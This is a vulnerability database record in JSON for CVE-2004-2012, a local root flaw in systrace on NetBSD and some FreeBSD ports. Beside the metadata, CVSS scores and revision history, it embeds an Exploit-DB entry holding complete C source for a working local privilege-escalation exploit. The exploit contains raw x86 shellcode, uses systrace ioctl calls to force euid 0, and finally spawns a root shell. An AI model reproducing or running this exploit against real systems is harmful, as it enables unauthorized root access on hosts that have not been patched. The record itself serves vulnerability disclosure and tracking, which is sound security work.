ID CVE-2004-2012 Type cve Reporter NVD Modified 2017-07-10T21:31:32
Description
The systrace_exit function in the systrace utility for NetBSD-current and 2.0 before April 16, 2004, and certain FreeBSD ports, does not verify the owner of the /dec/systrace connection before setting euid to 0, which allows local users to gain root privileges.
{"id": "CVE-2004-2012", "bulletinFamily": "NVD", "title": "CVE-2004-2012", "description": "The systrace_exit function in the systrace utility for NetBSD-current and 2.0 before April 16, 2004, and certain FreeBSD ports, does not verify the owner of the /dec/systrace connection before setting euid to 0, which allows local users to gain root privileges.", "published": "2004-12-31T00:00:00", "modified": "2017-07-10T21:31:32", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2012", "reporter": "NVD", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/16110", "http://marc.info/?l=bugtraq&m=108432258920570&w=2", "http://www.securityfocus.com/bid/10320"], "cvelist": ["CVE-2004-2012"], "type": "cve", "lastseen": "2017-07-11T11:14:39", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:vladimir_kotal:systrace_port_for_freebsd:2004-03-09", "cpe:/a:niels:provos_systrace:1.3", "cpe:/a:niels:provos_systrace:1.1", "cpe:/a:niels:provos_systrace:1.5", "cpe:/a:vladimir_kotal:systrace_port_for_freebsd:2004-06-02", "cpe:/a:niels:provos_systrace:1.2", "cpe:/a:niels:provos_systrace:1.4", "cpe:/o:netbsd:netbsd:2.0"], "cvelist": ["CVE-2004-2012"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The systrace_exit function in the systrace utility for NetBSD-current and 2.0 before April 16, 2004, and certain FreeBSD ports, does not verify the owner of the /dec/systrace connection before setting euid to 0, which allows local users to gain root privileges.", "edition": 2, "enchantments": {}, "hash": "c17a906a64c9a511d60addf189d4d14b93093c0483b8ab0f2f101147203ea47f", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "1818188f76a26b3720dce451603f5a89", "key": "href"}, {"hash": "742efffe939b1c5a29441da60655b854", "key": "references"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "f3ed268732578f678a27b315cbcb57dd", "key": "cpe"}, {"hash": "8d01b3f7405442a63e5c8249be351108", "key": "published"}, {"hash": "cb40a1baec8a8c52f84aff27210a8fa4", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "42e2dcb1323abbd1ef65657fb11298dc", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "63106727aa4e3621ca92fe51a5e26856", "key": "modified"}, {"hash": "43d140847570fb0db6c9de270880d6b0", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2012", "id": "CVE-2004-2012", "lastseen": "2017-04-18T15:50:42", "modified": "2016-10-17T23:04:49", "objectVersion": "1.2", "published": "2004-12-31T00:00:00", "references": ["http://xforce.iss.net/xforce/xfdb/16110", "http://marc.info/?l=bugtraq&m=108432258920570&w=2", "http://www.securityfocus.com/bid/10320"], "reporter": "NVD", "scanner": [], "title": "CVE-2004-2012", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-04-18T15:50:42"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:vladimir_kotal:systrace_port_for_freebsd:2004-03-09", "cpe:/a:niels:provos_systrace:1.3", "cpe:/a:niels:provos_systrace:1.1", "cpe:/a:niels:provos_systrace:1.5", "cpe:/a:vladimir_kotal:systrace_port_for_freebsd:2004-06-02", "cpe:/a:niels:provos_systrace:1.2", "cpe:/a:niels:provos_systrace:1.4", "cpe:/o:netbsd:netbsd:2.0"], "cvelist": ["CVE-2004-2012"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The systrace_exit function in the systrace utility for NetBSD-current and 2.0 before April 16, 2004, and certain FreeBSD ports, does not verify the owner of the /dec/systrace connection before setting euid to 0, which allows local users to gain root privileges.", "edition": 1, "hash": "f489ad5e0d3089c52563c3587d3449b79d0f8feb33d7c19a4a7a230981216d9e", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "1818188f76a26b3720dce451603f5a89", "key": "href"}, {"hash": "92e562f1650876bcdaf98c9c3871d6a5", "key": "modified"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "f3ed268732578f678a27b315cbcb57dd", "key": "cpe"}, {"hash": "8d01b3f7405442a63e5c8249be351108", "key": "published"}, {"hash": "cb40a1baec8a8c52f84aff27210a8fa4", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "42e2dcb1323abbd1ef65657fb11298dc", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "c6e0666f0ccddcd7af457665036a3929", "key": "references"}, {"hash": "43d140847570fb0db6c9de270880d6b0", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2012", "id": "CVE-2004-2012", "lastseen": "2016-09-03T04:45:31", "modified": "2008-09-05T16:42:57", "objectVersion": "1.2", "published": "2004-12-31T00:00:00", "references": ["http://xforce.iss.net/xforce/xfdb/16110", "http://marc.theaimsgroup.com/?l=bugtraq&m=108432258920570&w=2", "http://www.securityfocus.com/bid/10320"], "reporter": "NVD", "scanner": [], "title": "CVE-2004-2012", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T04:45:31"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "f3ed268732578f678a27b315cbcb57dd"}, {"key": "cvelist", "hash": "cb40a1baec8a8c52f84aff27210a8fa4"}, {"key": "cvss", "hash": "cfd16da9581e0c21db590e40dfd9e493"}, {"key": "description", "hash": "43d140847570fb0db6c9de270880d6b0"}, {"key": "href", "hash": "1818188f76a26b3720dce451603f5a89"}, {"key": "modified", "hash": "d2a13bec0e1d637e0332a447babcce2d"}, {"key": "published", "hash": "8d01b3f7405442a63e5c8249be351108"}, {"key": "references", "hash": "88ff834199964aa0accbcb0cc6dce48b"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "42e2dcb1323abbd1ef65657fb11298dc"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "1fda77fc7d7f530886bf302d5776e51b8db4b2a78b42edfdd7b5307bd5d54496", "viewCount": 0, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2017-07-11T11:14:39"}, "vulnersScore": 7.2}, "objectVersion": "1.3", "cpe": ["cpe:/a:vladimir_kotal:systrace_port_for_freebsd:2004-03-09", "cpe:/a:niels:provos_systrace:1.3", "cpe:/a:niels:provos_systrace:1.1", "cpe:/a:niels:provos_systrace:1.5", "cpe:/a:vladimir_kotal:systrace_port_for_freebsd:2004-06-02", "cpe:/a:niels:provos_systrace:1.2", "cpe:/a:niels:provos_systrace:1.4", "cpe:/o:netbsd:netbsd:2.0"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"result": {"exploitdb": [{"lastseen": "2016-02-02T22:32:41", "osvdbidlist": ["6035"], "references": [], "description": "NetBSD/FreeBSD Port Systrace 1.x Exit Routine Access Validation Privilege Escalation Vulnerability. CVE-2004-2012. Local exploit for bsd platform", "edition": 1, "reporter": "Stefan Esser", "published": "2004-05-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "exploitdb", "title": "NetBSD/FreeBSD Port Systrace 1.x - Exit Routine Access Validation Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2012"], "modified": "2004-05-11T00:00:00", "id": "EDB-ID:24113", "href": "https://www.exploit-db.com/exploits/24113/", "sourceData": "source: http://www.securityfocus.com/bid/10320/info\r\n\r\nA vulnerability has been reported that affects Systrace on NetBSD, as well as the FreeBSD port by Vladimir Kotal. \r\n\r\nThe source of the issue is insufficient access validation when a systraced process is restoring privileges. \r\n\r\nThis issue can be exploited by a local attacker to gain root privileges on a vulnerable system.\r\n\r\n#include <stdio.h>\r\n#include <sys/ioctl.h>\r\n#include <fcntl.h>\r\n#include <sys/systrace.h>\r\n\r\n#define systrace_device \"/dev/systrace\"\r\n\r\nchar MAGIC[] = \"\\x53\\x31\\xc0\\x50\\x50\\x50\\x50\\xb8\\x03\\x00\\x00\\x00\"\r\n \"\\xcd\\x80\\x83\\xc4\\x10\\xb8\\x00\\x00\\xc0\\xbf\\x94\\x50\"\r\n \"\\xb8\\x03\\x00\\x00\\x00\\xcd\\x80\\x5b\\x87\\xe3\\x5b\\xc3\";\r\n\r\nvoid (*magic)(void) = MAGIC;\r\n\r\nint nbsd_systrace_open()\r\n{\r\n int fd;\r\n\r\n printf(\"[+] Connecting to %s... \", systrace_device);\r\n fd = open(systrace_device, O_RDONLY, 0);\r\n if (fd == -1) {\r\n perror(\"failed with error: \");\r\n printf(\"\\nSorry but the exploit failed\\n\");\r\n exit(1);\r\n }\r\n printf(\"done.\\n\");\r\n\r\n return (fd);\r\n}\r\n\r\nint nbsd_attach_parent(int fd)\r\n{\r\n pid_t pid = getppid();\r\n\r\n printf(\"[+] Attaching to parent... \");\r\n if (ioctl(fd, STRIOCATTACH, &pid) == -1) {\r\n perror(\"failed with error: \");\r\n printf(\"\\nSorry but the exploit failed\\n\");\r\n }\r\n printf(\"done.\\n\");\r\n return (0);\r\n}\r\n\r\nvoid nbsd_handle_msg(int fd)\r\n{\r\n struct str_message msg;\r\n struct systrace_answer ans;\r\n int r;\r\n\r\n r = read(fd, &msg, sizeof(msg));\r\n\r\n if (r != sizeof(msg)) {\r\n exit(1);\r\n }\r\n\r\n memset(&ans, 0, sizeof(ans));\r\n ans.stra_pid = msg.msg_pid;\r\n ans.stra_seqnr = msg.msg_seqnr;\r\n ans.stra_policy = SYSTR_POLICY_PERMIT;\r\n ans.stra_flags =\r\nSYSTR_FLAGS_RESULT|SYSTR_FLAGS_SETEUID|SYSTR_FLAGS_SETEUID;\r\n ans.stra_error = 0;\r\n ans.stra_seteuid = getuid();\r\n ans.stra_setegid = getgid();\r\n\r\n if (ioctl(fd, STRIOCANSWER, &ans) == -1);\r\n\r\n}\r\n\r\nvoid doit()\r\n{\r\n int p,f,fd;\r\n\r\n fd = nbsd_systrace_open();\r\n\r\n f = fork();\r\n\r\n if (f == 0) {\r\n sleep(1);\r\n nbsd_attach_parent(fd);\r\n while (1) {\r\n nbsd_handle_msg(fd);\r\n }\r\n exit(1);\r\n }\r\n printf(\"[+] Doing some magic... \");\r\n sleep(2);\r\n magic();\r\n\r\n setuid(0);\r\n setgid(0);\r\n\r\n kill(f, 9);\r\n\r\n if (getuid() != 0) {\r\n printf(\"failed.\\n\");\r\n printf(\"\\nSorry but the exploit failed.\");\r\n exit(1);\r\n }\r\n\r\n printf(\"done.\\n\\n\");\r\n\r\n system(\"uname -v\");\r\n system(\"id\");\r\n execlp(\"/bin/sh\", \"/bin/sh\", 0);\r\n}\r\n\r\nvoid banner()\r\n{\r\n printf(\"NetBSD/x86 systrace local root exploit\\n\");\r\n printf(\"by ziegenpeter\\n\\n\");\r\n\r\n if (getuid() == 0) {\r\n printf(\"no comment\\n\");\r\n exit(1);\r\n }\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n int fd;\r\n banner();\r\n doit();\r\n return (0);\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24113/"}]}}
